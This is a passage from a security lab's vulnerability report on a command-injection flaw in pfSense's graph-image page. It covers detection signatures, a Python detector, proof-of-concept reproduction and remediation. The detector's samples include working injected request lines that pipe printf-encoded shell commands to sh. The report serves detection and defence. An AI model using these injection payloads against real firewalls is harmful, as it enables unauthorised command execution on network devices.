0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 34 38 3a Apr 2016 18:48:
0170 35 32 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 52 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 34 38 3a 35 32 20 47 4d 54 0d 0a 53 65 72 76 65 48:52 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
[...Truncated for readability...]
0260 20 69 6e 20 2f 75 73 72 2f 6c 6f 63 61 6c 2f 77 in /usr/local/w
0270 77 77 2f 73 74 61 74 75 73 5f 72 72 64 5f 67 72 ww/status_rrd_gr
0280 61 70 68 5f 69 6d 67 2e 70 68 70 20 6f 6e 20 6c aph_img.php on l
0290 69 6e 65 20 31 32 37 32 0a 0d 0a ine 1272...
6. Attack Detection
6.1. Remote Detection of Generic Attacks
pfSense serves the webConfigurator over HTTPS by default. To detect a generic attack using this vulnerability, the
detection device must therefore be able to decrypt the HTTPS traffic (for example by terminating TLS in front of the
firewall or by being provisioned with the webConfigurator's private key) and then inspect the HTTP traffic on the
ports mentioned in the section entitled "Attack Delivery".
The format of HTTP requests and of their parameters is described in section 4.1.
The detection device must look for HTTP requests to the following URI:
/status_rrd_graph_img.php
If a request to this URI is found, the detection device must extract the value assigned to the request parameter
graph and URL-decode it. If the decoded value contains a pipe character "|" (sent either literally or as %7C, where
the hexadecimal digits of the percent-encoding may be in either case) or a grave accent "`" (sent literally or as
%60), then an attack exploiting this vulnerability is likely underway.
Note: Apart from the hexadecimal digits of percent-encoded sequences, all string matching described above must be
done in a case-sensitive manner.
6.2. Remote Detection of Known Exploits
The detection device must look for HTTP requests containing all of the following strings:
String 1:
\\145\\143\\150\\157
String 2:
\\160\\150\\160
String 3:
|
String 4:
status_rrd_graph_img.php
String 5:
graph=
Strings 1 and 2 are octal escape sequences that decode to "echo" and "php", the same encoding the captured request
in section 5.5 feeds to printf to build its command; the doubled backslashes are what appears on the wire, since
the shell reduces each "\\" to "\" before printf sees it.
If all of these strings are detected then an attack using the public exploit is likely underway. This signature
matches only the published proof of concept; the generic rule in section 6.1 also covers payloads that run other
commands or percent-encode the pipe character.
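The two rules above, implemented in Python as an added example (this is not part of the report's own tooling). It
parses the request line, URL-decodes the query so that %7C, %7c and %60 are caught by the generic rule, and applies
the five-string signature to both the raw and the decoded request. The request lines it is run over are the
injected request from section 5.5 plus constructed samples: one shaped like the published proof of concept
(printf-encoded "echo x>/tmp/x.php", constructed here, not the real PoC), one with a percent-encoded pipe, one
benign graph request, and one with a pipe on an unrelated URI. It inspects only the query string, which is where
the captured attack carries the parameter; the TLS decryption requirement from section 6.1 is outside its scope.

```python
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/status_rrd_graph_img.php"
SHELL_METACHARS = ("|", "`")

# Section 6.2 strings exactly as they appear on the wire (doubled backslashes).
PUBLIC_EXPLOIT_STRINGS = (
    r"\\145\\143\\150\\157",   # octal escapes for "echo"
    r"\\160\\150\\160",        # octal escapes for "php"
    "|",
    "status_rrd_graph_img.php",
    "graph=",
)


def parse_request_line(line):
    """Split 'METHOD request-target HTTP/x.y' into (method, path, query)."""
    parts = line.strip().split(" ")
    if len(parts) != 3:
        raise ValueError(f"not an HTTP request line: {line!r}")
    method, target, _version = parts
    url = urlsplit(target)
    return method, url.path, url.query


def graph_values(query):
    """Every URL-decoded value supplied for the graph parameter (it may repeat)."""
    return parse_qs(query, keep_blank_values=True).get("graph", [])


def is_generic_attack(line):
    """Section 6.1: URI matched case-sensitively, metacharacters checked after
    URL-decoding so that %7C, %7c and %60 are caught as well as literal ones."""
    _method, path, query = parse_request_line(line)
    if path != TARGET_PATH:
        return False
    return any(c in value for value in graph_values(query) for c in SHELL_METACHARS)


def is_public_exploit(line):
    """Section 6.2: all five strings present, in the raw line or its decoded form."""
    return any(all(s in text for s in PUBLIC_EXPLOIT_STRINGS)
               for text in (line, unquote(line)))


def classify(line):
    if is_public_exploit(line):
        return "public exploit"
    if is_generic_attack(line):
        return "generic attack"
    return "clean"


# Sample request lines. The first is the injected request from the packet
# decodes in section 5.5; the others are constructed for this example.
CAPTURED_REQUEST = (
    r"GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20"
    r"\\164\\157\\165\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo HTTP/1.1"
)
SAMPLE_REQUESTS = {
    "captured": CAPTURED_REQUEST,
    # Same shape as the published PoC: printf-encoded "echo x>/tmp/x.php" (constructed).
    "poc_shaped": (
        r"GET /status_rrd_graph_img.php?database=wan-traffic.rrd&graph=file|printf%20"
        r"\\145\\143\\150\\157\\040\\170\\076\\057\\164\\155\\160\\057\\170\\056"
        r"\\160\\150\\160|sh|echo HTTP/1.1"
    ),
    # Pipe percent-encoded with lowercase hex: evades a literal-only match.
    "encoded": "GET /status_rrd_graph_img.php?database=wan-traffic.rrd&graph=inpass%7cid HTTP/1.1",
    "benign": "GET /status_rrd_graph_img.php?database=wan-traffic.rrd&graph=inpass HTTP/1.1",
    # Metacharacter present, but not on the vulnerable URI.
    "other_uri": "GET /index.php?graph=a|b HTTP/1.1",
}


def classify_samples():
    return {name: classify(line) for name, line in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:10s} {verdict}")
```

The captured request is flagged by the generic rule but not by the public-exploit signature, since it runs touch
rather than echo and php; the signature confirms the known proof of concept and is not a substitute for the generic
rule.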
7. Exploit Reproduction
7.1. Exploit Overview
TELUS Security Labs has provided a proof-of-concept poc.html to illustrate the impact of this vulnerability. To
trigger the vulnerability, an authenticated pfSense user clicks the hyperlink embedded within the HTML; the browser
then sends the injected request to the webConfigurator together with the user's session cookie. Upon processing, a
file named "test" should be created in the "/tmp/" directory on the pfSense host.
Note that before this PoC is used the "<target-ip>" string should be replaced with the IP address of the machine
running pfSense. The user clicking on the hyperlink must be an authenticated pfSense user.
8. Public Exploits
8.1. Public Exploit [SA]
8.1.1. Exploit overview
The discoverer has published a proof-of-concept exploit demonstrating this vulnerability. The exploit has been
made available via:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
9. Remediation Details
The risks posed by this vulnerability can be mitigated or eliminated by:
Upgrading to pfSense 2.3 or later (versions prior to 2.3 are affected, see section 2.1).
Filtering attack traffic using the information provided in the "Attack Detection" section.
The vendor has released the following advisory regarding this vulnerability:
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
11. Credits
Principal contributors, researchers, and reviewers for this report include the following members of the TELUS
Security Labs Research Team:
Vincent Lee
Sivathmican Sivakumaran